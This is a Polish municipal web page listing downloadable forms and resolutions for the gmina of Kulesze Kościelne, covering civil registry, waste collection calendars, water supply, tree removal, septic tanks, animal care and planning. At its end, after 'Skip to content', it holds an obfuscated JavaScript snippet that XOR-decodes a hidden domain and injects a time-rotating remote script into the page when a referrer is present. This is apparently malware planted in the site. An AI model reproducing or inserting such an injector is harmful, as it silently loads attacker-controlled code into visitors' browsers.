Druki do pobrania

Urząd Stanu Cywilnego

Wniosek_o_wydanie_dowodu_osobistego

 

Podatki i opłaty lokalne

 

Azbest

Program usuwania azbestu

Informacja o ilości wyrobów zawierających azbest przeznaczonych do unieszkodliwienia

Zaopatrzenie w wodę

Wniosek o wydanie warunków technicznych podłączenia do sieci wodociągowej

Wniosek rozwiązanie umowy

Wniosek zawarcie umowy

 

Ochrona środowiska i gospodarka odpadami

Decyzje Środowiskowe

Wniosek o wydanie decyzji środowiskowej

 Gospodarka Odpadami

Deklaracja o wysokości opłaty za gospodarowanie odpadami

KALENDARZ GMINY kulesze kościelne odbiór odpadów 2023 Trasa I

KALENDARZ GMINY kulesze kościelne odbiór odpadów 2023 TRASA II

KALENDARZ GMINY kulesze kościelne odbiór odpadów 2023 TRASA III

KALENDARZ GMINY kulesze kościelne odbiór odpadów 2023

uchwała metoda i stawka opłaty za gosp.odpadami-1-1

Uchwała regulamin utrzymania czystości i porządku w gminie Kulesze Kościelne

Uchwała w sprawie szczegółowego sposobu i zakresu świadczenia usług

Uchwała w sprawie terminu i częstotliwości uiszczania opłaty za gosp

 Wycinka drzew

Zgłoszenie zamiaru usunięcia drzew lub krzewów

Wniosek o wydanie zezwolenia na usunięcie drzewa lub krzewu

Oświadczenie zgoda właściciela współwłaściciela nieruchomości na usunięcie drzew

Zbiorniki bezodpływowe

Rejestr firm asenizacyjnych

wniosek udzielenie zezwolenia oproznianie zbiornikow bezodpływowych i transportu

ZGŁOSZENIE DO_GMINNEJ_EWIDENCJI_ZBIORNIKOW_BEZODPLYWOWYCH_I_PRZYDOMOWYCH_OCZYSZCZALNI_SCIEKOW

Opieka nad zwierzętami

Uchwała.XXXIV 218 2023 w sprawie przyjęcia programu opieki nad zwierzętami bezdomnymi oraz zapobiegania bezdomności zwierząt na terenie gminy Kulesze Kościelne w 2023 roku

Uchwała Nr XXXV 222 2023 Rady Gminy Kulesze Kościelne z dnia 19 maja 2023 r. zmieniająca uchwałę w sprawie przyjęcia programu opieki nad zwierzętami bezdomnymi….

Wniosek-o-udzielenie-zezwolenia-na-prowadzenie-dzialalnosci-w-zakresie-prowadzenia-schronisk-dla-bezdomnych-zwierzat-a-takze-grzebowisk-i-spalarni-zwlok-zwierzecych-i-ich-czesci

Wniosek-o-udzielenie-zezwolenia-na-prowadzenie-dzialalnosci-w-zakresie-prowadzenia-schronisk-dla-bezdomnych-zwierzat-a-takze-grzebowisk-i-spalarni-zwlok-zwierzecych-i-ich-czesci-1

 

Planowanie przestrzenne i rolnictwo

wniosek o wydanie kopii dokumentów

wniosek o podział

WNIOSEK o zmiane decyzji o Warunkach Zabudowy

Wniosek_o_ustalenie_lokalizacji_inwestycji_celu_publicznego_albo_warunków_zabudowy

wniosek-o-rozgraniczenie-nieruchomości-1

wniosek-o-przeznaczeniu-działki-wiele działek

wniosek-o-przeznaczeniu-działki-pojedyńcza działka

Uchwała Nr XXXVIII 238 2023 w sprawie uchwalenia zmiany Studium uwarunkowań i kierunków zagospodarwoania.

KIERUNKI – Studium Gminy Kulesze Koscielne

Rysunek Studium Gminy Kulesze Kościelne

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);